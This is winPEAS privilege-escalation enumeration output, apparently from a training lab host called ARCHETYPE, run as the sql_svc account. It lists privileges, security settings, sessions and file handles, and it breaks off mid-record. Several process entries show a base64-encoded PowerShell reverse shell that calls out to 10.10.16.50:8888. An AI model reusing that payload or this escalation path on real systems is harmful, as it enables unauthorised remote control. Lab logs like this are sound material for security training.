Test
Test
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
/---------------------------------------------------------------------------
------\
| Do you like PEASS?
|
|---------------------------------------------------------------------------------|
|---------------------------------------------------------------------------------|
| Thank you!
|
\---------------------------------------------------------------------------
------/
[+] Legend:
Red Indicates a special privilege over an object or
something is misconfigured
Green Indicates that some protection is enabled or something
is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
????????????????????????????????????? System
Information ?????????????????????????????????????
???????????? Wdigest
? If enabled, plain-text crds could be stored in LSASS
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#wdigest
???????????? AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
auditbasedirectories : 0
auditbaseobjects : 0
Bounds : 00-30-00-00-00-20-00-00
crashonauditfail : 0
fullprivilegeauditing : 00
LimitBlankPasswordUse : 1
NoLmHash : 1
Security Packages : ""
Notification Packages : scecli
Authentication Packages : msv1_0
SecureBoot : 1
LsaPid : 620
LsaCfgFlagsDefault : 0
ProductType : 7
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest : 0
restrictanonymous : 0
restrictanonymoussam : 1
ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : False
ServerNegotiateSigning : False
LdapSigning : Negotiate signing (Negotiate signing)
Session Security
eventlog
Everyone [WriteData/CreateFiles]
O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-
1860270145-482643319-2788375705-1540778122)
sql\query
Everyone [WriteData/CreateFiles], sql_svc [AppendData/CreateDirectories] O:S-1-5-
21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-
513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)
SQLLocal\MSSQLSERVER
Everyone [WriteData/CreateFiles], sql_svc [AppendData/CreateDirectories] O:S-1-5-
21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-
513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)
vgauth-service
Everyone [WriteData/CreateFiles]
O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
===================================================================================
==============
CLR Versions
4.0.30319
.NET Versions
4.7.03190
???????????? Printing Account Logon Events (4624) for the last 10 days.
You must be an administrator to run this check
???????????? Process creation events - searching logs (EID 4688) for sensitive
data.
???????????? PowerShell events - script block logs (EID 4104) - searching for
sensitive data.
????????????????????????????????????? Users
Information ?????????????????????????????????????
???????????? Users
? Check if you have some admin equivalent privileges
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-
escalation/index.html#users--groups
===================================================================================
==============
ARCHETYPE\sql_svc
|->Groups: Users
|->Password: CanChange-NotExpi-Req
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
Domain: ARCHETYPE
SID: S-1-5-21-1479773013-2644727484-962428355
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: DOMAIN_PASSWORD_COMPLEX
===================================================================================
==============
===================================================================================
==============
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 335452
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 8:09:57 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:09:57 AM
User Name: sql_svc
User Principal Name:
User SID:
===================================================================================
==============
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 6233225
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 12:28:31 PM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 12:28:31 PM
User Name: sql_svc
User Principal Name:
User SID:
===================================================================================
==============
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 4227863
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 10:30:13 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 10:30:13 AM
User Name: sql_svc
User Principal Name:
User SID:
===================================================================================
==============
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 544125
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 8:17:23 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:17:23 AM
User Name: sql_svc
User Principal Name:
User SID:
===================================================================================
==============
????????????????????????????????????? Processes
Information ?????????????????????????????????????
===================================================================================
==============
powershell(1216)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] --
POwn: sql_svc
Command Line: powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==
===================================================================================
==============
===================================================================================
==============
cmd(2472)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc
Command Line: "C:\Windows\system32\cmd.exe" /c powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
powershell(744)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] --
POwn: sql_svc
Command Line: powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==
===================================================================================
==============
===================================================================================
==============
powershell(1800)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] --
POwn: sql_svc
Command Line: powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA
uAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAwAC
IALAA4ADgAOAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAc
gBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1
AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACg
AJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIA
AwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhA
G0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcA
ZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwB
rACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAG
cAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAU
wAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0
AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGU
AdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdA
BlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApA
DsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUA
KAApAA==
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
